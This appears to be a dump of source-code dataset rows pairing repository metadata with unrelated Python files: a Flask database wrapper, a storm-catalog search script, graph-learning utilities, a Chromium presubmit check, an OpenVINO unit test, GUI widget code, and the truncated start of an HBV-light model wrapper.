|
2020-10-15T09:10:57.000Z
|
class AccessLevel:
def canAccess(self, rights, minPermission):
return ''.join(map(lambda i: 'A' if i>= minPermission else 'D', rights))
| 37
| 80
| 0.668919
|
62d40178d4ac42ab1d5da1cbd7cba287dd2476ee
| 353
|
py
|
Python
|
backend/src/infrastructures/database.py
|
Seina88/attendance-system
|
afa7ba64c7fd99623a1c5dd3b09151ade759d715
|
[
"MIT"
] | 2
|
2021-05-12T14:09:44.000Z
|
2021-06-19T12:38:33.000Z
|
backend/src/infrastructures/database.py
|
Seina88/attendance-system
|
afa7ba64c7fd99623a1c5dd3b09151ade759d715
|
[
"MIT"
] | 10
|
2021-05-13T12:09:47.000Z
|
2021-06-07T13:28:17.000Z
|
backend/src/infrastructures/database.py
|
Seina88/attendance-system
|
afa7ba64c7fd99623a1c5dd3b09151ade759d715
|
[
"MIT"
] | 1
|
2021-06-17T00:54:04.000Z
|
2021-06-17T00:54:04.000Z
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
class Database(SQLAlchemy):
def __init__(self) -> None:
super().__init__()
self.migrate = Migrate()
def initialize(self, app: Flask) -> None:
self.init_app(app)
self.migrate.init_app(app, self)
db = Database()
| 20.764706
| 45
| 0.677054
|
a6b91a1d18734a1d217b1058702945911322dfff
| 6,993
|
py
|
Python
|
Assignment5/src/scripts/catalog_search.py
|
shikashyam/BigDataSystemsCoursework
|
d7f9cabbfb18b0e3303292b65af1ffd530e24ccc
|
[
"MIT"
] | null | null | null |
Assignment5/src/scripts/catalog_search.py
|
shikashyam/BigDataSystemsCoursework
|
d7f9cabbfb18b0e3303292b65af1ffd530e24ccc
|
[
"MIT"
] | null | null | null |
Assignment5/src/scripts/catalog_search.py
|
shikashyam/BigDataSystemsCoursework
|
d7f9cabbfb18b0e3303292b65af1ffd530e24ccc
|
[
"MIT"
] | 4
|
2022-02-12T23:59:54.000Z
|
2022-02-16T22:53:32.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 10 14:24:15 2022
@author: shshyam
"""
from importlib.resources import path
import h5py
import math
import boto3
from botocore.handlers import disable_signing
from os import walk
import os
import pandas as pd
from geopy import distance
from geopy import Point
import gcsfs
import numpy as np
fs=gcsfs.GCSFileSystem(project="sevir-project-bdia",token="cloud_storage_creds.json")
def searchincache(lat,long,distlimit):
print('In Search cache function')
cache_file=fs.open("gs://sevir-data-2/sevir_cache.csv",'rb')
cache = pd.read_csv(cache_file)
myloc=Point(lat,long)
cache['distance']=cache.apply(lambda row: distancer(row,myloc), axis=1)
cache=cache[cache["distance"] < int(distlimit)]
if cache.empty:
return 'N',None,None,None
else:
cache=cache.sort_values(by='distance')
fileloc=cache.iloc[0]['image_location']
timestamp=cache.iloc[0]['timestamp']
print("Searched and found:",lat,":",long,":",fileloc)
print('LOG : SearchBy : LatLong, Refresh_flag : N, Threshold_time : N/A, Lat :',lat,', Long :', long,', City : N/A, State : N/A, EventID :',float(fileloc.split('.')[0]))
textnarrative='FUNCTIONALITY NOT SET YET'
return 'Y',timestamp,fileloc,textnarrative
def searchgeocoordinates(approxlat,approxlong,distlimit):
print('In search GeoCoordinates function')
catalog = pd.read_csv("https://raw.githubusercontent.com/MIT-AI-Accelerator/eie-sevir/master/CATALOG.csv")
catalog=catalog[catalog['event_id'].isna()==False]
catalog=catalog[catalog['pct_missing']!=0]
catalog=catalog[(catalog['file_name']=='vil/2019/SEVIR_VIL_STORMEVENTS_2019_0101_0630.h5') | (catalog['file_name']=='vil/2018/SEVIR_VIL_STORMEVENTS_2018_0101_0630.h5')]
catalog['lat']=(catalog.llcrnrlat+catalog.urcrnrlat)/2
catalog['long']=(catalog.llcrnrlon+catalog.urcrnrlon)/2
myloc=Point(approxlat,approxlong)
catalog['distance']=catalog.apply(lambda row: distancer(row,myloc), axis=1)
catalog=catalog[catalog["distance"] < int(distlimit)]
if catalog.empty:
return None,None,None,None,None,None,None
else:
catalog=catalog.sort_values(by='distance')
lat=catalog.iloc[0]['llcrnrlat']
long=catalog.iloc[0]['llcrnrlon']
event_id=catalog.iloc[0]['event_id']
filename=catalog.iloc[0]['file_name']
fileidx=catalog.iloc[0]['file_index']
eventsummary,episodesummary=findstormdetails(event_id)
# if eventsummary==np.nan:
# eventsummary=''
# if episodesummary==np.nan:
# episodesummary=''
return round(lat,6),round(long,6),event_id,filename,fileidx,eventsummary,episodesummary
def findstormdetails(event_id):
stormdetails_path=fs.open("gs://sevir-data-2/data/storm_details_file.csv",'rb')
stormdetails = pd.read_csv(stormdetails_path)
eventsummary=stormdetails[(stormdetails['EVENT_ID']==event_id)]['EVENT_NARRATIVE'].unique()
episodesummary=stormdetails[(stormdetails['EVENT_ID']==event_id)]['EPISODE_NARRATIVE'].unique()
if((np.size(eventsummary)>0)&(np.size(episodesummary)>0)):
if eventsummary==np.nan:
eventsummary=''
if episodesummary==np.nan:
episodesummary=''
return eventsummary[0],episodesummary[0]
else:
return None,None
def distancer(row,myloc):
coords_1 = myloc
coords_2 = (row['lat'], row['long'])
return distance.distance(coords_1, coords_2).miles
def searchcataloglatlong(lat, long):
print("Inside SearchCatalogLatLong")
event_id,date=get_event_id(lat,long)
if((event_id!='None')):
filename,fileindex,catalog=get_filename_index(event_id)
return filename,fileindex[0]
else:
return None,None
def searchcatalogdatetime(date,time,city,state):
stormdetails_path=fs.open("gs://sevir-data-2/data/storm_details_file.csv",'rb')
stormdetails = pd.read_csv(stormdetails_path)
date=date.replace('-','')
yrmonth=date[0:6]
day=date[6:8]
time=time.replace(':','')
event_id = stormdetails[(stormdetails['BEGIN_YEARMONTH'] == int(yrmonth)) & (stormdetails['BEGIN_DAY']==int(day))& (stormdetails['BEGIN_TIME']==int(time)) & (stormdetails['CZ_NAME']==city)& (stormdetails['STATE']==state)]['EVENT_ID'].unique()
if(np.size(event_id)>0):
filename,fileindex,catalog=get_filename_index(event_id[0])
eventsummary=stormdetails[(stormdetails['EVENT_ID']==event_id[0])]['EVENT_NARRATIVE'].unique()
episodesummary=stormdetails[(stormdetails['EVENT_ID']==event_id[0])]['EPISODE_NARRATIVE'].unique()
if(np.size(fileindex)>0):
return filename,event_id[0],fileindex[0],eventsummary[0],episodesummary[0]
else:
return None,None,None,None,None
else:
return None,None,None,None,None
def get_event_id(lat,lon):
print('inside geteventid')
df1 = pd.read_csv("https://raw.githubusercontent.com/MIT-AI-Accelerator/eie-sevir/master/CATALOG.csv")
df1= df1.round({'llcrnrlat':6,'llcrnrlon':6})
try:
date = df1[(df1['llcrnrlon']== lon) & ( df1['llcrnrlat']==lat)]['time_utc'].unique()[0]
event_id = df1[(df1['llcrnrlon']== lon) & ( df1['llcrnrlat']==lat)]['event_id'].unique()
except:
print('Lat and long not found')
date= 'None'
event_id = 'None'
if(np.size(event_id)==0):
date='None'
event_id='None'
return event_id,date
def get_filename_index(event_id):
catlog = pd.read_csv("https://raw.githubusercontent.com/MIT-AI-Accelerator/eie-sevir/master/CATALOG.csv")
filtered = pd.DataFrame()
filtered = pd.concat([filtered,catlog[(catlog["event_id"] == int(event_id))]])
allfilenames = filtered['file_name'].unique()
vilpd=catlog[(catlog["event_id"] == int(event_id)) & (catlog['img_type']=='vil') & (catlog['pct_missing']!=0)]
filename=vilpd['file_name'].unique()
fileindex = vilpd['file_index'].to_list()
catalog = pd.read_csv("https://raw.githubusercontent.com/MIT-AI-Accelerator/eie-sevir/master/CATALOG.csv")
newcatalog=catalog[(catalog['file_name'].isin(allfilenames))]
return filename, fileindex,newcatalog
def download_hf(filename):
resource = boto3.resource('s3')
resource.meta.client.meta.events.register('choose-signer.s3.*', disable_signing)
bucket=resource.Bucket('sevir')
for i in range(len(filename)):
filename1 = "data/" + filename[i]
return filename[i]
def One_Sample_HF(directory,fileindex,filenames):
newfilepath=''
for i in range(len(filenames)):
with h5py.File(directory+filenames[i],'r') as hf:
image_type = filenames[i].split('_')[1]
if image_type == "VIL":
VIL = hf['vil'][int(fileindex[0])]
return "sample"
| 38.213115
| 246
| 0.664951
|
25c89e53d50fb33b43f0e59880085fc54a0dfd86
| 5,041
|
py
|
Python
|
utilities.py
|
dingdanhao110/HINGCN
|
281b73c03bd3b00e35bce4c5e1c27076233555e4
|
[
"MIT"
] | null | null | null |
utilities.py
|
dingdanhao110/HINGCN
|
281b73c03bd3b00e35bce4c5e1c27076233555e4
|
[
"MIT"
] | null | null | null |
utilities.py
|
dingdanhao110/HINGCN
|
281b73c03bd3b00e35bce4c5e1c27076233555e4
|
[
"MIT"
] | null | null | null |
import numpy as np
import scipy.sparse as sp
import torch
def encode_onehot(labels):
classes = set(labels)
classes_dict = {c: np.identity(len(classes))[i, :] for i, c in
enumerate(classes)}
labels_onehot = np.array(list(map(classes_dict.get, labels)),
dtype=np.int32)
return labels_onehot
def read_metapath(path="../data/cora/", dataset="cora", num_mps=1):
"""read metapath file, A1~A2 pairs"""
print('Loading {} dataset...'.format(dataset))
idx_features_labels = np.genfromtxt("{}{}.content".format(path, dataset),
dtype=np.dtype(str))
features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)
features = normalize(features)
features = torch.FloatTensor(np.array(features.todense()))
labels = encode_onehot(idx_features_labels[:, -1])
labels = torch.LongTensor(np.where(labels)[1])
# build graph
idx = np.array(idx_features_labels[:, 0], dtype=np.int32)
idx_map = {j: i for i, j in enumerate(idx)}
adjs = []
for path_idx in range(num_mps):
edges_unordered = np.genfromtxt("{}{}_{}.metapaths".format(path, dataset, path_idx),
dtype=np.int32)
edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),
dtype=np.int32).reshape(edges_unordered.shape)
adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),
shape=(features.shape[0], features.shape[0]),
dtype=np.float32)
# build symmetric adjacency matrix
adj= adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)
adj = normalize(adj + sp.eye(adj.shape[0]))
adj = sparse_mx_to_torch_sparse_tensor(adj)
adjs.append(adj.unsqueeze(0))
adjs = torch.cat(adjs)
idx_train = range(140)
idx_val = range(200, 500)
idx_test = range(500, 1500)
idx_train = torch.LongTensor(idx_train)
idx_val = torch.LongTensor(idx_val)
idx_test = torch.LongTensor(idx_test)
return adjs, features, labels, idx_train, idx_val, idx_test
def normalize(mx):
"""Row-normalize sparse matrix"""
rowsum = np.array(mx.sum(1))
r_inv = np.power(rowsum, -1).flatten()
r_inv[np.isinf(r_inv)] = 0.
r_mat_inv = sp.diags(r_inv)
mx = r_mat_inv.dot(mx)
return mx
def sparse_mx_to_torch_sparse_tensor(sparse_mx):
"""Convert a scipy sparse matrix to a torch sparse tensor."""
sparse_mx = sparse_mx.tocoo().astype(np.float32)
indices = torch.from_numpy(
np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))
values = torch.from_numpy(sparse_mx.data)
shape = torch.Size(sparse_mx.shape)
return torch.sparse.FloatTensor(indices, values, shape)
def accuracy(output, labels):
preds = output.max(1)[1].type_as(labels)
correct = preds.eq(labels).double()
correct = correct.sum()
return correct / len(labels)
def read_metapath_raw(path="../data/cora/", dataset="cora", num_mps=1):
"""read metapath file, A1,A2,pathsim triples, return adj are not normalized"""
print('Loading {} dataset...'.format(dataset))
idx_features_labels = np.genfromtxt("{}{}.content".format(path, dataset),
dtype=np.dtype(str))
features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)
features = normalize(features)
features = torch.FloatTensor(np.array(features.todense()))
labels = encode_onehot(idx_features_labels[:, -1])
labels = torch.LongTensor(np.where(labels)[1])
# build graph
idx = np.array(idx_features_labels[:, 0], dtype=np.int32)
idx_map = {j: i for i, j in enumerate(idx)}
adjs = []
for path_idx in range(num_mps):
edges_unordered = np.genfromtxt("{}{}_{}.metapaths".format(path, dataset, path_idx),
dtype=np.int32)
edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),
dtype=np.int32).reshape(edges_unordered.shape)
adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),
shape=(features.shape[0], features.shape[0]),
dtype=np.bool)
# build symmetric adjacency matrix
adj= adj + adj.T
# adj = (adj + sp.eye(adj.shape[0])) # no normalization
adj = sparse_mx_to_torch_sparse_tensor(adj)
adjs.append(adj)
# adjs.append(adj.unsqueeze(0))
# adjs = torch.cat(adjs)
idx_train = range(140)
idx_val = range(200, 500)
idx_test = range(500, 1500)
idx_train = torch.LongTensor(idx_train)
idx_val = torch.LongTensor(idx_val)
idx_test = torch.LongTensor(idx_test)
return adjs, features, labels, idx_train, idx_val, idx_test
def pathsim(A):
value = []
x,y = A.nonzero()
for i,j in zip(x,y):
value.append(2 * A[i, j] / (A[i, i] + A[j, j]))
return sp.coo_matrix((value,(x,y)))
| 35.251748
| 92
| 0.617933
|
cd3a1b337f47f74f3704e9b7f726067e4dde96e7
| 1,396
|
py
|
Python
|
chrome/tools/build/PRESUBMIT.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 76
|
2020-09-02T03:05:41.000Z
|
2022-03-30T04:40:55.000Z
|
chrome/tools/build/PRESUBMIT.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 45
|
2020-09-02T03:21:37.000Z
|
2022-03-31T22:19:45.000Z
|
chrome/tools/build/PRESUBMIT.py
|
zealoussnow/chromium
|
fd8a8914ca0183f0add65ae55f04e287543c7d4a
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 8
|
2020-07-22T18:49:18.000Z
|
2022-02-08T10:27:16.000Z
|
# Copyright (c) 2011 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Presubmit script for FILES.cfg controlling which files are archived.
See http://dev.chromium.org/developers/how-tos/depottools/presubmit-scripts
for more details about the presubmit API built into depot_tools.
"""
USE_PYTHON3 = True
_PLATFORMS = ['android', 'chromeos', 'linux', 'mac', 'win']
def _CheckChange(input_api, output_api):
results = []
affected_files = input_api.change.LocalPaths()
for platform in _PLATFORMS:
files_config_path = input_api.os_path.join(platform, 'FILES.cfg')
for filepath in affected_files:
if filepath.endswith(files_config_path):
output, error = input_api.subprocess.Popen(
['python', files_config_path],
stdout=input_api.subprocess.PIPE,
stderr=input_api.subprocess.PIPE).communicate()
if output or error:
results.append(output_api.PresubmitError(
files_config_path + " syntax error: \n" + output + error))
return results
def CheckChangeOnUpload(input_api, output_api):
results = []
results.extend(_CheckChange(input_api, output_api))
return results
def CheckChangeOnCommit(input_api, output_api):
results = []
results.extend(_CheckChange(input_api, output_api))
return results
| 34.9
| 75
| 0.724928
|
cb3dabb438d1901773b85be7fccd37ee3fb9b4e5
| 7,996
|
py
|
Python
|
model-optimizer/extensions/front/interpolate_reshape_test.py
|
Andruxin52rus/openvino
|
d824e371fe7dffb90e6d3d58e4e34adecfce4606
|
[
"Apache-2.0"
] | 2
|
2020-11-18T14:14:06.000Z
|
2020-11-28T04:55:57.000Z
|
model-optimizer/extensions/front/interpolate_reshape_test.py
|
Andruxin52rus/openvino
|
d824e371fe7dffb90e6d3d58e4e34adecfce4606
|
[
"Apache-2.0"
] | 30
|
2020-11-13T11:44:07.000Z
|
2022-02-21T13:03:16.000Z
|
model-optimizer/extensions/front/interpolate_reshape_test.py
|
mmakridi/openvino
|
769bb7709597c14debdaa356dd60c5a78bdfa97e
|
[
"Apache-2.0"
] | 1
|
2020-12-18T15:47:45.000Z
|
2020-12-18T15:47:45.000Z
|
"""
Copyright (C) 2018-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import numpy as np
from generator import generator, generate
from extensions.front.interpolate_reshape import InterpolateWithConcat
from mo.front.common.partial_infer.utils import int64_array
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph, result, regular_op_with_shaped_data, valued_const_with_data, connect, \
connect_data
nodes = {
**regular_op_with_shaped_data('placeholder', [1, 3, 30, 40], {'type': 'Parameter', 'op': 'Parameter'}),
**valued_const_with_data('out_shape', np.array([60, 160])),
**regular_op_with_shaped_data('interpolate', [1, 3, 60, 160],
{'type': 'Interpolate', 'axes': int64_array([2, 3]), 'op': 'Interpolate',
'version': 'opset1'}),
**regular_op_with_shaped_data('identity_00', [1, 3, 60, 160], {'identity': True, 'op': 'Identity'}),
**regular_op_with_shaped_data('identity_01', [1, 3, 60, 160], {'identity': True, 'op': 'Identity'}),
**regular_op_with_shaped_data('shape', [4], {'type': 'ShapeOf', 'op': 'ShapeOf'}),
**valued_const_with_data('indices', np.array([2, 3])),
**valued_const_with_data('axis', np.array(0)),
**regular_op_with_shaped_data('gather', [2], {'type': 'Gather', 'op': 'Gather'}),
**regular_op_with_shaped_data('placeholder_1', [1, 3, 60, 160], {'type': 'Parameter', 'op': 'Parameter'}),
**regular_op_with_shaped_data('identity_10', [1, 3, 60, 160], {'identity': True, 'op': 'Identity'}),
**regular_op_with_shaped_data('identity_11', [1, 3, 60, 160], {'identity': True, 'op': 'Identity'}),
**regular_op_with_shaped_data('concat', [1, 7, 60, 160], {'type': 'Concat', 'axis': 1, 'op': 'Concat'}),
**valued_const_with_data('N', np.array([1])),
**result('output'),
**result('output_1'),
}
@generator
class TestInterpolateConcat(unittest.TestCase):
def test_interpolate_concat_reshape_graph_comparison(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
InterpolateWithConcat().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('placeholder_1', 'shape'),
*connect('shape', '0:gather'),
*connect('indices', '1:gather'),
*connect('axis', '2:gather'),
*connect('gather', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect_data('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_interpolate_identity_concat_reshape_graph_comparison(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', 'identity_00'),
*connect('identity_00', 'identity_01'),
*connect('identity_01', '0:concat'),
*connect('placeholder_1', 'identity_10'),
*connect('identity_10', 'identity_11'),
*connect('identity_11', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
InterpolateWithConcat().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect_data('identity_11', 'shape'),
*connect('shape', '0:gather'),
*connect('indices', '1:gather'),
*connect('axis', '2:gather'),
*connect('gather', '1:interpolate'),
*connect('interpolate', 'identity_00'),
*connect('identity_00', 'identity_01'),
*connect('identity_01', '0:concat'),
*connect('placeholder_1', 'identity_10'),
*connect('identity_10', 'identity_11'),
*connect('identity_11', '1:concat'),
*connect('concat', 'output'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_interpolate_concat_negate(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', 'identity_00'),
*connect('interpolate', 'identity_01'),
*connect('identity_00', 'output'),
*connect('identity_01', 'output_1'),
], nodes_with_edges_only=True)
InterpolateWithConcat().find_and_replace_pattern(graph)
graph.clean_up()
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', 'identity_00'),
*connect('interpolate', 'identity_01'),
*connect('identity_00', 'output'),
*connect('identity_01', 'output_1'),
], nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
@generate(*[
{'concat': {'axis': None}},
{'concat': {'axis': -1}},
{'interpolate': {'axes': None}},
{'interpolate': {'axes': np.array([1])}},
{'interpolate': {'axes': np.array([2, -1])}},
])
def test_negative_axes_conditions(self, update_attrs):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], update_attributes=update_attrs, nodes_with_edges_only=True)
InterpolateWithConcat().find_and_replace_pattern(graph)
graph_ref = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect('placeholder_1', '1:concat'),
*connect('concat', 'output'),
], update_attributes=update_attrs, nodes_with_edges_only=True)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
def test_interpolate_tf_style_concat(self):
graph = build_graph(nodes, [
*connect('placeholder', '0:interpolate'),
*connect('out_shape', '1:interpolate'),
*connect('interpolate', '0:concat'),
*connect('N', '1:concat'),
*connect('concat', 'output'),
], update_attributes={'concat': {'N': 1}}, nodes_with_edges_only=True)
graph_ref = graph.copy()
InterpolateWithConcat().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
| 45.175141
| 120
| 0.613057
|
544ba8d98f7b58f7dedf98f8e8746522d8285a52
| 5,419
|
py
|
Python
|
Drago2Dengine/__versions__/win32/raw/__core__/__widgets__.py
|
DragoNext/Drago-2D-Engine
|
d740186d8a1807127bff3d351df152ccadbaba09
|
[
"MIT"
] | null | null | null |
Drago2Dengine/__versions__/win32/raw/__core__/__widgets__.py
|
DragoNext/Drago-2D-Engine
|
d740186d8a1807127bff3d351df152ccadbaba09
|
[
"MIT"
] | null | null | null |
Drago2Dengine/__versions__/win32/raw/__core__/__widgets__.py
|
DragoNext/Drago-2D-Engine
|
d740186d8a1807127bff3d351df152ccadbaba09
|
[
"MIT"
] | null | null | null |
class D2DWidgets:
def __init__(self,D2DOBJ,EVMANAGER):
"""Widgets :D"""
self.D2D = D2DOBJ
self.EVENT_MANAGER = EVMANAGER
self.WIDGETS = []
# _std standard events for widgets :3
def _std_x(self,*ALL_VARIABLESIN):
''' Example
ARGS = [but, BUTTON_XY, BUTTON_SIZE, BUTTON_COLOR, BUTTON_TEXTUREID, ON_HOVER,ON_HOVER_RETRACT, HOVER_DELAY, ON_CLICK, ON_CLICK_RETRACT, CLICK_DELAY, COMMAND]
'''
def _std_darken(self,widget):
widget = widget[0]
self.D2D.edit_color(widget[0],
[max(0,widget[3][0]-0.1), max(0,widget[3][1]-0.1),
max(0,widget[3][2]-0.1), max(0,widget[3][3])])
def _std_lighten(self,widget):
widget = widget[0]
self.D2D.edit_color(widget[0],
[max(1,widget[3][0]+0.1), max(1,widget[3][1]+0.1),
max(1,widget[3][2]+0.1), max(1,widget[3][3])])
def _std_out(self,widget):
pass
def _std_hoverback_color(self,widget):
widget = widget[0]
self.D2D.edit_color(widget[0], [ widget[3][0], widget[3][1], widget[3][2], widget[3][3]])
def _std_clickback_color(self,widget):
widget = widget[0]
self.D2D.edit_color(widget[0], [ widget[3][0], widget[3][1], widget[3][2], widget[3][3]])
widget[-1](widget)
def _hover_dropbox(self,widget):
main_widget = widget[0][0]
xy = main_widget[1]
size = main_widget[2]
sub_widgets = []
for i in widget[0][1:]:
sub_widgets.append(i[0])
r = 0
for i in sub_widgets:
self.D2D.edit_pos(i,[xy[0],xy[1]+size[1]+r],size)
r+=+size[1]
def _inv_hover_dropbox(self,widget):
main_widget = widget[0][0]
xy = main_widget[1]
size = main_widget[2]
sub_widgets = []
for i in widget[0][1:]:
sub_widgets.append(i[0])
for i in sub_widgets:
self.D2D.edit_pos(i,[0,0],[0,0])
def create_dropbox(self,DROP_XY=[0,0],DROP_SIZE=[0,0],DROP_COLOR=[1,0,0,1],DROP_FONT=None,DROP_TEXTUREID=0,
DROPSHOW_HOVER=True,
ENTRIES = [],
ON_HOVER=None,ON_HOVER_RETRACT=None,HOVER_DELAY=100,
ON_CLICK=None,ON_CLICK_RETRACT=None,CLICK_DELAY=100,
COMMAND=None):
drp = self.D2D.create_quad(DROP_XY,DROP_SIZE,DROP_COLOR,DROP_TEXTUREID)
self.WIDGETS.append([drp,DROP_XY,DROP_SIZE,DROP_COLOR])
ARGS = [[drp,DROP_XY,DROP_SIZE],]
if len(ENTRIES) > 1:
for i in ENTRIES:
aew = self.D2D.create_quad([0,0],[0,0],DROP_COLOR,DROP_TEXTUREID)
ARGS.append([aew])
else:
pass
if DROPSHOW_HOVER == True:
pass # Show it
self.EVENT_MANAGER.add_event('Motion',[DROP_XY[0],DROP_XY[1],DROP_XY[0]+DROP_SIZE[0],DROP_XY[1]+DROP_SIZE[1]],
(self._hover_dropbox,ARGS),
(self._inv_hover_dropbox,ARGS)
,HOVER_DELAY)
else:
pass # show it when clicked
def create_button(self,BUTTON_XY=[0,0],BUTTON_SIZE=[0,0],BUTTON_COLOR=[1,0,0,1],BUTTON_TEXTUREID=0,
ON_HOVER=None,ON_HOVER_RETRACT=None,HOVER_DELAY=100,
ON_CLICK=None,ON_CLICK_RETRACT=None,CLICK_DELAY=100,
COMMAND=None,
TEXT=None,TEXT_FONT=None):
but = self.D2D.create_quad(BUTTON_XY,BUTTON_SIZE,BUTTON_COLOR,BUTTON_TEXTUREID)
if TEXT != None:
if TEXT_FONT != None:
pass
else:print('Text is specified "'+TEXT+'" But TEXT_FONT is None? Please specify font.')
self.WIDGETS.append([but,BUTTON_XY,BUTTON_SIZE,BUTTON_COLOR])
if ON_CLICK == None:
ON_CLICK = self._std_darken
elif ON_CLICK == 'light':
ON_CLICK = self._std_lighten
elif ON_CLICK == 'darken':
ON_CLICK = self._std_darken
else:pass #OnClick is specified (If not properly it will raise error cannot call variable or something.
if ON_HOVER == None:
ON_HOVER = self._std_darken
elif ON_HOVER == 'light':
ON_HOVER = self._std_lighten
elif ON_HOVER == 'darken':
ON_HOVER = self._std_darken
else:pass
if ON_CLICK_RETRACT == None:
ON_CLICK_RETRACT = self._std_clickback_color
if ON_HOVER_RETRACT == None:
ON_HOVER_RETRACT = self._std_hoverback_color
if COMMAND == None:
COMMAND = self._std_out
ARGS = [but, BUTTON_XY, BUTTON_SIZE, BUTTON_COLOR, BUTTON_TEXTUREID, ON_HOVER,ON_HOVER_RETRACT, HOVER_DELAY, ON_CLICK, ON_CLICK_RETRACT, CLICK_DELAY, COMMAND]
# Hover
self.EVENT_MANAGER.add_event('Motion',[BUTTON_XY[0],BUTTON_XY[1],BUTTON_XY[0]+BUTTON_SIZE[0],BUTTON_XY[1]+BUTTON_SIZE[1]],
(ON_HOVER,ARGS),
(ON_HOVER_RETRACT,ARGS)
,HOVER_DELAY)
# Click
self.EVENT_MANAGER.add_event('LeftClick',[BUTTON_XY[0],BUTTON_XY[1],BUTTON_XY[0]+BUTTON_SIZE[0],BUTTON_XY[1]+BUTTON_SIZE[1]],
(ON_CLICK,ARGS),
(ON_CLICK_RETRACT,ARGS)
,CLICK_DELAY)
# Command
| 34.297468
| 166
| 0.567448
|
cadea28ff7367d4fa75e3181feeddcf44516bbce
| 8,467
|
py
|
Python
|
hbvpy/core/model.py
|
GironsLopez/hbvpy
|
c90241a444f2d111358234f42982cd573ff3c7bd
|
[
"BSD-3-Clause"
] | 1
|
2022-01-11T12:13:31.000Z
|
2022-01-11T12:13:31.000Z
|
hbvpy/core/model.py
|
GironsLopez/hbvpy
|
c90241a444f2d111358234f42982cd573ff3c7bd
|
[
"BSD-3-Clause"
] | null | null | null |
hbvpy/core/model.py
|
GironsLopez/hbvpy
|
c90241a444f2d111358234f42982cd573ff3c7bd
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
hbvpy.model
===========
**A package to run the command line version of HBV-light.**
This package is intended to provide bindngs to the command line version of
HBV-light so the model can be run from a python script.
.. author:: Marc Girons Lopez
"""
import os
import subprocess
from hbvpy.ThirdParty import AnimatedProgressBar
__all__ = ['HBVcatchment', 'HBVsimulation']
class HBV(object):
"""
Set the command line version of HBV-light (HBV-light-CLI.exe).
Attributes
----------
hbv_path : str, optional
Non-default HBV-light-CLI.exe path, default is None.
Raises
------
ValueError
If the specified path to the HBV-light-CLI.exe file does not exist.
"""
def __init__(self, hbv_path=None):
if hbv_path is None:
self.hbv_path = (
'C:\\Program Files (x86)\\HBV-light\\HBV-light-CLI.exe')
else:
self.hbv_path = hbv_path
if not os.path.exists(self.hbv_path):
raise ValueError(
'The specified HBV-ligh-CLI.exe file does not exist.')
class HBVsimulation(HBV):
"""
HBV-light simulation setup.
This class defines the input data and configuration files for setting up
a particular simulation setup.
HBV-light will search for the default files in the data directory and use
them if they are present. If the user decides not to use a specific file
(that is located in the data directory with a default name), the str
'dummy.txt' should be passed to the corresponding attribute.
Attributes
----------
hbv_path : str, optional
Non-default HBV-light-CLI.exe path, default is None.
c : str, optional
File with catchment settings, default is 'Clarea.xml'.
p : str, optional
File with parameter settings, default is 'Parameter.xml'.
s : str, optional
